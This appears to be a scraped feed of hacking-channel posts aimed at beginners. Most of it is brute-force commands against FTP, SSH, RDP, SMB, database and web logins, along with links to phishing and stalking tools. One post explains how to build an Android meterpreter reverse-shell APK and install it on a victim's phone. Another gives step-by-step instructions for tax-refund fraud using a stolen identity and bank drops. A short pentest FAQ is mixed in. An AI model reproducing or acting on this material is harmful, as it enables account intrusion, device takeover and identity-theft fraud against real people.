1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,689,705,771,783,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4679,4848,5000,5038,5040,5051,5060-5061,5093,5168,5247,5250,5351,5353,5355,5400,5405,5432-5433,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7001,7021,7071,7080,7144,7181,7210,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8800,8812,8834,8880,8888-8890,8899,8901-8903,9000,9002,9080-9081,9084,9090,9099-9100,9111,9152,9200,9390-9391,9495,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27017,27888,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48899,49152,50000-50004,50013,50500-50504,52302,55553,57772,62078,62514,65535

UDP Discovery 🔎

53,123,161,1434

Authentication Ports ⌨️

1494,80,5985,5986,8200,902,9084,6129

Easy-win Ports 🏆

1099,1098,8500,623,6002,700,4848,9060,10000,11211,3632,3299

Database Ports ⚗️

3306,1521-1527,5432,5433,1433,3050,3351,1583,8471,9471

NoSQL Ports 🚫

27017,28017,27080,5984,900,9160,7474,6379,8098

@𝑇𝘩𝑒𝑀𝑎𝑠𝑡𝑒𝑟𝐶𝐻) ⚠️

Enjoy! follow us for more...

The Beginner Bruteforce Guide

Requirements:-

- Wordlist (https://github.com/danielmiessler/SecLists)
- Username(or userlist /usr/share/wordlist)
- Kali Linux or Termux (Google For Termux For Tools Installation!)
- Working Internet

FTP Bruteforce 📁

1️⃣ Hydra 🐍
$ hydra -l superuser -P pwd.txt -v -f -e ns -t 5 -w 20 <ip> ftp >> brute_ftp.out

$ hydra -t 5 -V -f -l root -P common.txt ftp://<ip> >> brute_ftp.out

$ hydra -v -f -l ftp -P fpass.lst -t 10 ftp://<ip> >> brute_ftp.out

$ hydra -l root -P 500-worst-passwords.txt <ip> ftp

For the parameters please type hydra -h !

2️⃣ Medusa 🗿
$ medusa -u test -P 500-worst-passwords.txt -h <ip> -M ftp

$ medusa -M ftp -h <ip> -u username -p password

SSH 📡

1️⃣ Medusa 🗿
$ medusa -h <target> -P /root/pasword.txt -u root -M ssh

2️⃣ NCrack 🦀
$ ncrack -p ssh -u root --pass 'root'
<target>

3️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -P common.txt localhost ssh >> brute_ssh.out

$ hydra -v -l root -P 500-worst-passwords.txt <target> ssh >> brute_ssh.out

$ hydra -v -l root -P fpass.lst -t 5 ssh://ip -o brute_ssh.out

Telnet 📞

1️⃣ Hydra 🐍
$ hydra -v -l root -P fpass.lst -t 5 telnet://<ip> >> brute_telnet.out

$ hydra -l username -P wordlist -t 4 -s 23 -e ns -f -v <ip> telnet >> brute_telnet.out

2️⃣ Medusa 🗿
$ medusa -h <ip> -M telnet -U user.txt -P password.txt

SMTP 📧

1️⃣ Medusa 🗿
$ medusa -M smtp -m AUTH:NTLM -U accounts.txt -p password

$ medusa -M smtp -m EHLO:world -U accounts.txt -p password

SMTP VRFY 📧

1️⃣ Medusa 🗿
$ medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com

2️⃣ Smtp-User-Enum 🔩
$ smtp-user-enum -M VRFY -U /home/weak_wordlist/userall.txt -t <ip>

SMTP RCPT TO 📧

1️⃣ Medusa 🗿
medusa -M smtp-vrfy -m VERB:RCPT TO -U accounts.txt -p domain.com

HTTP 🔓

1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -p 12345678 -e s -V -f <ip> http-get

HTTPS 🔐

1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -P List.txt -e s -V -f <ip> https-get

POP3 📥

1️⃣ Medusa 🗿
$ medusa -M pop3 -m MODE:AS400 -U accounts.txt -p password

$ medusa -M pop3 -m DOMAIN:<url> -U accounts.txt -p password

2️⃣ Hydra 🐍
$ hydra -l muts -P pass.txt my.pop3.mail pop3 >> brute_pop3.out

$ hydra -S -l <youremail@domain> -P password.lst pop3.live.com -s 995 pop3 >> brute_pop3.out

SMB 📡

1️⃣ Hydra 🐍
$ hydra -v -l Administrator -P fpass.lst smb://<ip> >> brute_smb.out

$ hydra -L user.txt -P pass.txt -e ns -f -v -V -w5 <ip> smb >> brute_smb.out

2️⃣ Medusa 🗿
$ medusa -h <ip> -u administrator -P passwords.txt -e ns -M smbnt >> brute_smb.out

Cisco 🖲
1️⃣ Hydra 🐍
$ hydra -f -v -P pass.txt <ip> cisco >> brute_cisco.out

$ hydra -m cloud -P pass.txt <ip> cisco-enable >> brute_cisco.out

MSSQL 🧱

1️⃣ Hydra 🐍
$ hydra -v -l sa -P fpass.lst -t 4 <ip> mssql -o brute_mssql.out

$ hydra -t 5 -V -f -l sa -P "C:\pass.txt" <ip> mssql

$ hydra mssql://<ip>:1433 -l sa -P /root/Desktop/parolalar

MySQL 📅

1️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql

$ hydra -v -l root -P fpass.lst -t 1 mysql://ip -o brute_mysql.out

RDP 🔮

1️⃣ Hydra 🐍
$ hydra -v -f -l administrator -P common.txt rdp://<ip> // not good

2️⃣ Medusa 🗿
$ medusa -u administrator -P /usr/share/john/password.lst -h 10.10.10.71 -M rdp

3️⃣ NCrack 🦀
$ ncrack -p rdp -u administrator --pass 'password' -iL in2

$ ncrack -vv --user offsec -P password-file.txt rdp://<ip>

WebForm 🕸
1️⃣ Hydra 🐍
$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"

@𝑇𝘩𝑒𝑀𝑎𝑠𝑡𝑒𝑟𝐶𝐻) ⚠️

Enjoy! Follow us for more...

Domain Info Gathering

1️⃣ WHOIS query
2️⃣ DNS query
3️⃣ NsLookup query
4️⃣ Domain name deletion time record query
5️⃣ Archive record batch

Encode & Decode

Encoder is a utility to help you encode and decode data in various formats, build hashes of common hashing functions and do general text transformations.

Intelligence Gathering

Recon can swiftly gather intelligence on a wide range of targets, sourced from public databases to explore the relationship between large and complicated datasets.

Web Resource Discovery UNFold supports both resource enumeration through dictionaries but also active spidering during the vulnerability discovery process.
https://secapps.com/suite/

*Some Tools*

NodeJsScan - A Static Security Code Scanner For Node.js Applications
https://github.com/ajinabraham/NodeJsScan

Jok3R - Network And Web Pentest Framework
https://github.com/koutto/jok3r

WiFi Brute Force Attack
https://github.com/TideSec/WDScanner
https://github.com/Tlgyt/WiBr
https://github.com/galkan/crowbar

Raptor Web-based Source Code Vulnerability Scanner
https://github.com/Vulnerability-scanner/raptor

Prowler – Distributed Network Vulnerability Scanner
https://github.com/tlkh/prowler

Fuxi Scanner - Network Security Vulnerability Scanner
https://github.com/ym2011/PEST/tree/master/Fuxi-Scanner

29 Docker Security Tools
https://sysdig.com/blog/20-docker-security-tools/

R3Con1Z3R - Web Information Gathering Tool
https://github.com/abdulgaphy/r3con1z3r

TIDoS - Framework - Offensive Manual Web Applicatoin Pentesting Framework
https://github.com/0xInfection/TIDoS-Framework

Th3inspector - Information Gathering
https://github.com/Moham3dRiahi/Th3inspector

EagleEye - Stalk Your Friends
https://github.com/ThoughtfulDev/EagleEye

BlackEye - Phishing Tool
https://github.com/thelinuxchoice/blackeye

Webkiller - Information Gathering Tool
https://github.com/ultrasecurity/webkiller

BruteSpray - NMap Brute Force Script
https://github.com/x90skysn3k/brutespray

DirSearch - Web Path Scanner
https://github.com/maurosoria/dirsearch

Masscan - TCP Port Scanner
https://github.com/robertdavidgraham/masscan

Mercury - Collect Information
https://github.com/MetaChar/Mercury

DevPloit - Information Gathering
https://github.com/vaginessa/Devploit

TinfoLeak - Twitter Intelligence Analysis
https://github.com/vaguileradiaz/tinfoleak

Photon - Fast Crawler For OSINT
https://github.com/s0md3v/Photon

Raccoon - Offensive Security Tool For Reconnaissance And Informatoin Gathering
https://github.com/evyatarmeged/Raccoon

SpiderFoot - OSINT Collection Automated
https://github.com/smicallef/spiderfoot

pwnedOrNot - OSINT Tools For Finding Password Of E-Mails
https://github.com/thewhiteh4t/pwnedOrNot

Enjoy! Follow us for more...

TURBO TAX WAVE SAUCE

*🔥🔥*

1. Get Pro ( For Info Use Only )

2. Make burner number if you
don’t already have

3. Create email to match pro name

4. Create account with turbo tax with pro name.

( ALWAYS CHOOSE FIRST TIME FILING OPTION OR YOU’LL BE REJECTED FOR
NOT HAVING AGI # )

5. Get W2 ( FROM ME IF YOU DONT HAVE ONE ) & ( for NUMBERS USE ONLY )

6. For ALL NUMBERS on filing out app use W2 numbers
KEY FACTOR

7. Get a bank drop, prepaid or whatever don’t matter, make sure it has account and routing number

8. Use the bank drop on filing part for direct deposit!!!!

9. Finish app using pro info.

10. Wait until it’s accepted. If it’s not accepted it’ll tell you were you messed up and how to fix it.( shouldn’t get denied if you did THESE STEPS correct )

GOOD LUCK ! WE ALL EAT 🤑💯

Enjoy! Follow us for more...

BEGINNERS NETWORK FAQ

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| BEGINNERS NETWORK FAQ |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#Networking

How does tracerout or tracert work?

Traceroute and tracert work to determine the route that goes from the host computer to a remote machine. It’s used to identify if packets are redirected, take too long, or the number of hops used to send traffic to a host.

Basic Information Security :

Why Should We Conduct A Penetration Test?

IT is an integral part of every company's business today. Therefore, not only the amount of business-critical data that is stored on IT systems grows, but also the dependency on a working IT infrastructure. This leads to an increased amount of attacks against IT systems in the form of industrial espionage, denial of service attacks and other possibilities to significantly harm a company. Important corporate secrets are spied on and sold to competitors.

The availability of systems is interrupted, as a non-working IT is causing more and more problems today. No new orders are placed, because competitors somehow always have the better offer. A penetration test gives you information about your systems' vulnerabilities, how probable a successful attack against your infrastructure is and how you can protect yourself against potential security breaches in the future.

Are There Legal Requirements For Penetration Tests?

It may not be mandatory to do a penetration test for corporations, but the German law for example includes numerous text passages in its commercial laws which could be validated by conducting a penetration test.

What Is The Workflow Of A Penetration Test?

In advance of every penetration test, an individual meeting is held. In this meeting, the various possibilities of a penetration test in relation to the customer's systems are discussed. A penetration test only makes sense if it is realised in an individual and customer-oriented way.

What Time Investment Do You Estimate For A Penetration Test?

The time investment for a penetration test varies from case to case depending on the systems to be tested and the individual test requirements. Usually, the time needed ranges from a few days to several weeks. One goal of the preliminary meeting is to get enough information about the systems to be tested to estimate the optimal length for the penetration test.

Human resources on the customer's side are usually only marginally bound. Most notably, a contact person for questions during the exploitation phase is required.

What Are Blackbox And Whitebox Tests?

A blackbox test is normally defined as a test where the penetration testers do not have any more information than attackers without internal knowledge might have. The idea is to check how deeply potential attackers can compromise your systems without any kind of internal information or access. All knowledge has to be gathered with classical reconnaissance (finding as much information as possible about the target) and enumeration (a deeper look at individual systems).

What Happens To Confidential Data Redteam Pentesting Gathers During The Penetration Test?

RedTeam Pentesting commits itself to absolute secrecy regarding your confidential data. A non-disclosure agreement (NDA) determining that RedTeam Pentesting treats a client's data as confidential is already part of every contract. All customer data, including information that is used to prepare a first quotation, is subject to the same obligation to confidentiality. At the end of a penetration test, all data and possible storage media is either securily destroyed or handed back to the client.

Web Penetration testing

What are some ways to avoid brute force hacks?

You can stop authentication after a certain amount of attempts and lock the account. You can also block IP addresses that flood the network. You can use IP restrictions on the firewall or server.

Encryption , SSL ,Cryptography ,authentication Questions

What kind of penetration can be done with the Diffie Hellman exchange?

A hacker can use the man in the middle attack with the Diffie Hellman exchange since neither side of the exchange is authenticated. Users can use SSL or encryption between messages to add some kind of security and authentication.

How can you encrypt email messages?

You can use PGP to encrypt email messages or some other form of a public private key pair system where only the sender and the recipient can read the messages.

What is the difference between asymmetric and symmetric encryption?

Symmetric encryption uses the same key for decryption and encryption.
Asymmetric uses different keys.

Have you been having trouble setting yourself apart from other candidates in your penetration testing interviews? If so, you should consider Pen Testing training to set yourself apart from the crowd. Fill out the form below for a course syllabus and pricing information on our instructor lead, live online and self paced training options.

Enjoy! Follow us for more...

Basic Wireshark Commands

Basic Commands For Frames With Passwords:
1️⃣ tcp.srcport == 22
2️⃣ http.host
3️⃣ dns.qry.name
4️⃣ ip contains google
5️⃣ ip contains .gov
6️⃣ tcp contains password
7️⃣ tcp contains "GET /"
8️⃣ tcp contains "POST /"
9️⃣ ip.src == <ip>
1️⃣0️⃣ ip.dst == <ip>
1️⃣1️⃣ ip.addr == <ip>
1️⃣2️⃣ tcp.port 80
1️⃣3️⃣ tcp.dstport == 22
1️⃣4️⃣ tcp.srcport == 22

Show only FTP and DNS traffic:
ftp || dns

Show all traffic except ARP and ICMP:
! arp &&! icmp

Show only HTTP to or from 192.168.0.1:
ip.addr == 192.168.0.1 && http
(can change to ur)

Search for zip or exe files:
tcp matches "zip" or tcp matches "exe"

Search for an ASCII string containing "PASS":
tcp contains "PASS"

Search for a specific ip address:
ip.addr == 192.168.0.1

IP address may not be:
note ip.addr == 192.168.0.1

Search for MAC address:
eth.addr == 00: 11: 11: 35: 11: 14

Search by port:
tcp.port == 139

Search for DNS port:
udp.dstport == 53

Search for HTTP POST request: Expression filter.
http.request.method == "POST"

POP3 USER request:
pop.request.command == "USER"
pop.request.command == "PASS"

FTP USER request:
ftp.request.command == "USER"
ftp.request.command == "PASS"

FTND FTP Data Channel:
ftp.response.code == 227 || ftp.request.command == "PORT"

SMTP Search for email recipient:
smtp.req.parameter == "TO: <mail@blop.dk>"
(change to ur target)
Search for Sender:
smtp.req.parameter == "FROM: <mail@blop.dk>"
(change to ur target)

SMTP Find all email recipients:
smtp.req.command == "RCPT"

Find windows client names:
browser.server

Browser Host Annoucement:
browser.command == 0x1

Hacking search string on http:
http.request.method == "GET" && frame contains "hacking"

Search for specific URI:
http.request.uri == "<website>"

Search for all where a connection has been created SYN + ACK (TCP connection was Successful):
tcp.flags == 0x12

SSL / TLS handshake - Shows all SSL / TLS handshakes:
ssl.record.content_type == 22

Search for HTTPS Server Helo - See if DH or DHE is used to encrypt connections.
ssl.handshake.certificate

Search for HTTP GET that contains index.php:
http.request.method == "GET" && http.request.full_uri matches "index \ .php \?. * ="

http.request.method == "GET" && http.request.full_uri contains "index.php?"

Look after . CN or .RU in HTTP:
http.host matches "(? i) [.] (ru | cn) $"

DNS:
dns.qry.name matches "(? i) [.] (cn | ru) $"

Filter on ports: This filter captures traffic on port 80 and 3128 only:
tcp dst port 80 or tpp dst port 3128

This filter captures all traffic to the 192,168 network:
dst net 192.168

This filter captures all traffic from the 192,168 network:
src net 192.168

This filter captures all traffic to or from the 192,168 network:
just 192.168

This filter captures all traffic to or from the following wlan (Wireless):
wlan host 00: 25: 64: 8c: 9f: 75

This filter only captures traffic to and from 192.168.10.1:
host 192.168.10.1

This filter captures traffic all traffic to or from the following networks with net masks:
just 192.168.10 mask 255.255.255.0

Filter out (port 80 traffic and DNS traffic):
! tcp.port == 80 and! udp.port == 53

This filter only looks at traffic on the follow port range 6881 to 6999 (BitTorrent):
portrange 6881-6999

Operatores:
1️⃣ Negation - (! Or not)
2️⃣ Concatenation (AND)
3️⃣ Alternation (or)

Comparison Operators:
Description Symbol Text
equal to == eq
or || or
and && and
greater than > gt
less than < lt
greater than or equal to > = ge
less than or equal to <= le
not ! groove
not equal to != ne
contains contains
matches matches
This filter will take all traffic to and from 192.168.10.1 and sent to port 53 TCP.
AND ensures that both sides of an operator must match before traffic is captured.
host 192.168.10.1 and tpp dst 53

This filter will capture all traffic end to 192.168.10.1 or match tcp port 53
192.168.10.1 or tpp dst 53

This merge captures all traffic that is to or from ip addresses that do not start with the 10.2 network.
not src net 10.2.0.0/16

Enjoy! Follow us for more...

darksploit installation process for termux

Execute these commands one by one to install DarkSploit.

$ apt update

$ apt upgrade

$ apt install git

$ apt install python

$ apt install python2

$ git clone https://github.com/LOoLzeC/DarkSploit

$ cd DarkSploit

$ cd install

$ sh installtermux.sh

$ pip2 install -r requirements.txt

$ cd ..

Now Run DarkSploit :

python2 DrXp.py

DarkSploit commands :

$ show options

$ show exploits

$ use exploits

Here you get all options to use this tool.

Enjoy! Follow us for more...

Kalimux installation process for termux

📝 Usage :-
Kalimux is bash based script which is used to install kali Linux in android mobile in termux with gui and without root.

Kalimux

🔥Installation and usage guide

$ apt-get update -y

$ apt-get upgrade -y

$ pkg install git -y

$ git clone https://github.com/noob-hackers/kalimux

$ ls

$ cd kalimux

$ ls

$ sh kalimux.sh

* So after installtion completes the text files will occur just copy it by long click on text*

$ ./start-kali.sh Now linux has been installed succesfullly in termux without root. But wait if you like to use kali linus as GUI in your android device then you need to download a application called VNC viewer after downloading that. just start kali linux in termux and paste that copied text in that and wait for it to install complete linux os in termux. After installation completes just apply this command in kali

$ vncserver-start Now the server starts on host 127.0.0.1:5901 Now open VNC viewer and click on + icon and create host access Now the the gui of kali linux has been started in VNC viewer so start practising now...... Note:- Don't remove termux from background while using kali linux in VNC viwer beacuse the vnc host files are present in termux app so...

Enjoy! follow us for more...

Instahack installation process for termux

📝 Usage :-

Instahack is tool used for instagram followers and maintaining Instagram by termux.

Instagramhack

🔥INSTAHACK🔥

$ apt update && apt upgrade

$ pkg install git

$ pkg install wget

$ pkg install curl

$ pkg install openssl-tool.

$ git clone https://github.com/thelinuxchoice/inshackle

Once it is installed, type ls to list up all what is in your terminal, after that type cd inshackle then run it by typing bash inshackle.sh or ./inshackle.sh
With the help of Instahackle, We can do the following things :

[01] Unfollow Tracker
[02] Increase Followers
[03] Download Stories
[04] Download Saved Content
[05] Download Following List
[06] Download Followers List
[07] Download Profile Info
[08] Activate Unfollower

Follow us for more...

Install 200tools for termux

200tools is a tool that provides tailor-made for begginers

$ apt update && apt upgrade -y

$ apt install git

$ apt install php

$ apt install curl

$ apt install ruby

$ apt install figlet

$ apt install python2

$ gem install lolcat

$ git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv3

$ cd TOOLSINSTALLERv3

$ chmod +x TUANB4DUT.sh

$ sh TUANB4DUT.sh

Enjoy! Follow us for more...

Full guide for installation and usage of metasploit in termux.

METASPLOIT INSTALLATION AND RUN COMMANDS

What is payload ?
A payload is a malware function of Trojan horse which transmit data from victim to attacker these type of malwares is called payload.

Commands :

$ apt-get update

$ apt-get updgrade

pkg install unstable-repo OR apt install unstable-repo

pkg install metasploit OR apt install metasploit

After installation

$ msfconsole

Wait 2min until open

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your IP) LPORT=4444 R > /sdcard /shell.apk

Want IP go to google search what is my IPv4 address 1st link open copy your ip

Payload is on internal storage send payload to victim install it on victim mobile

$ pkg install postgresql

$ pg_ctl -D $PREFIX/var/lib/postgresql start

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=ip R > /sdcard/name.apk

$ msfconsole

$ use exploit/multi/handler

$ set payload android/meterpreter/reverse_tcp

$ set LHOST

$ set LPORT

$ exploit

Follow us for more...

How to use IPjetable and 888RAT to port forwarding .mp4

Download now

Follow us f

Types of Cybercrime

ᴛʜᴇ ғᴏʟʟᴏᴡɪɴɢ ʟɪsᴛ ᴘʀᴇsᴇɴᴛs ᴛʜᴇ ᴄᴏᴍᴍᴏɴ ᴛʏᴘᴇs ᴏғ ᴄʏʙᴇʀᴄʀɪᴍᴇs:

ᴄᴏᴍᴘᴜᴛᴇʀ ғʀᴀᴜᴅ:
ɪɴᴛᴇɴᴛɪᴏɴᴀʟ ᴅᴇᴄᴇᴘᴛɪᴏɴ ғᴏʀ ᴘᴇʀsᴏɴᴀʟ ɢᴀɪɴ ᴠɪᴀ ᴛʜᴇ ᴜsᴇ ᴏғ ᴄᴏᴍᴘᴜᴛᴇʀ sʏsᴛᴇᴍs.

ᴘʀɪᴠᴀᴄʏ ᴠɪᴏʟᴀᴛɪᴏɴ:
ᴇxᴘᴏsɪɴɢ ᴘᴇʀsᴏɴᴀʟ ɪɴғᴏʀᴍᴀᴛɪᴏɴ sᴜᴄʜ ᴀs ᴇᴍᴀɪʟ ᴀᴅᴅʀᴇssᴇs, ᴘʜᴏɴᴇ ɴᴜᴍʙᴇʀ, ᴀᴄᴄᴏᴜɴᴛ ᴅᴇᴛᴀɪʟs, ᴇᴛᴄ. ᴏɴ sᴏᴄɪᴀʟ ᴍᴇᴅɪᴀ, ᴡᴇʙsɪᴛᴇs, ᴇᴛᴄ.

ɪᴅᴇɴᴛɪᴛʏ ᴛʜᴇғᴛ:
sᴛᴇᴀʟɪɴɢ ᴘᴇʀsᴏɴᴀʟ ɪɴғᴏʀᴍᴀᴛɪᴏɴ ғʀᴏᴍ sᴏᴍᴇʙᴏᴅʏ ᴀɴᴅ ɪᴍᴘᴇʀsᴏɴᴀᴛɪɴɢ ᴛʜᴀᴛ ᴘᴇʀsᴏɴ.

sʜᴀʀɪɴɢ ᴄᴏᴘʏʀɪɢʜᴛᴇᴅ ғɪʟᴇs/ɪɴғᴏʀᴍᴀᴛɪᴏɴ:
ᴛʜɪs ɪɴᴠᴏʟᴠᴇs ᴅɪsᴛʀɪʙᴜᴛɪɴɢ ᴄᴏᴘʏʀɪɢʜᴛ ᴘʀᴏᴛᴇᴄᴛᴇᴅ ғɪʟᴇs sᴜᴄʜ ᴀs ᴇʙᴏᴏᴋs ᴀɴᴅ ᴄᴏᴍᴘᴜᴛᴇʀ ᴘʀᴏɢʀᴀᴍs ᴇᴛᴄ.

ᴇʟᴇᴄᴛʀᴏɴɪᴄ ғᴜɴᴅs ᴛʀᴀɴsғᴇʀ:
ᴛʜɪs ɪɴᴠᴏʟᴠᴇs ɢᴀɪɴɪɴɢ ᴀɴ ᴜɴ-ᴀᴜᴛʜᴏʀɪᴢᴇᴅ ᴀᴄᴄᴇss ᴛᴏ ʙᴀɴᴋ ᴄᴏᴍᴘᴜᴛᴇʀ ɴᴇᴛᴡᴏʀᴋs ᴀɴᴅ ᴍᴀᴋɪɴɢ ɪʟʟᴇɢᴀʟ ғᴜɴᴅ ᴛʀᴀɴsғᴇʀs.

ᴇʟᴇᴄᴛʀᴏɴɪᴄ ᴍᴏɴᴇʏ ʟᴀᴜɴᴅᴇʀɪɴɢ:
ᴛʜɪs ɪɴᴠᴏʟᴠᴇs ᴛʜᴇ ᴜsᴇ ᴏғ ᴛʜᴇ ᴄᴏᴍᴘᴜᴛᴇʀ ᴛᴏ ʟᴀᴜɴᴅᴇʀ ᴍᴏɴᴇʏ.

ᴀᴛᴍ ғʀᴀᴜᴅ:
ᴛʜɪs ɪɴᴠᴏʟᴠᴇs ɪɴᴛᴇʀᴄᴇᴘᴛɪɴɢ ᴀᴛᴍ ᴄᴀʀᴅ ᴅᴇᴛᴀɪʟs sᴜᴄʜ ᴀs ᴀᴄᴄᴏᴜɴᴛ ɴᴜᴍʙᴇʀ ᴀɴᴅ ᴘɪɴ ɴᴜᴍʙᴇʀs. ᴛʜᴇsᴇ ᴅᴇᴛᴀɪʟs ᴀʀᴇ ᴛʜᴇɴ ᴜsᴇᴅ ᴛᴏ ᴡɪᴛʜᴅʀᴀᴡ ғᴜɴᴅs ғʀᴏᴍ ᴛʜᴇ ɪɴᴛᴇʀᴄᴇᴘᴛᴇᴅ ᴀᴄᴄᴏᴜɴᴛs.

ᴅᴇɴɪᴀʟ ᴏғ sᴇʀᴠɪᴄᴇ ᴀᴛᴛᴀᴄᴋs:
ᴛʜɪs ɪɴᴠᴏʟᴠᴇs ᴛʜᴇ ᴜsᴇ ᴏғ ᴄᴏᴍᴘᴜᴛᴇʀs ɪɴ ᴍᴜʟᴛɪᴘʟᴇ ʟᴏᴄᴀᴛɪᴏɴs ᴛᴏ ᴀᴛᴛᴀᴄᴋ sᴇʀᴠᴇʀs ᴡɪᴛʜ ᴀ ᴠɪᴇᴡ ᴏғ sʜᴜᴛᴛɪɴɢ ᴛʜᴇᴍ ᴅᴏᴡɴ.

sᴘᴀᴍ:
sᴇɴᴅɪɴɢ ᴜɴᴀᴜᴛʜᴏʀɪᴢᴇᴅ ᴇᴍᴀɪʟs. ᴛʜᴇsᴇ ᴇᴍᴀɪʟs ᴜsᴜᴀʟʟʏ ᴄᴏɴᴛᴀɪɴ ᴀᴅᴠᴇʀᴛɪsᴇᴍᴇɴᴛs.️️

Enjoy! Follow us for more...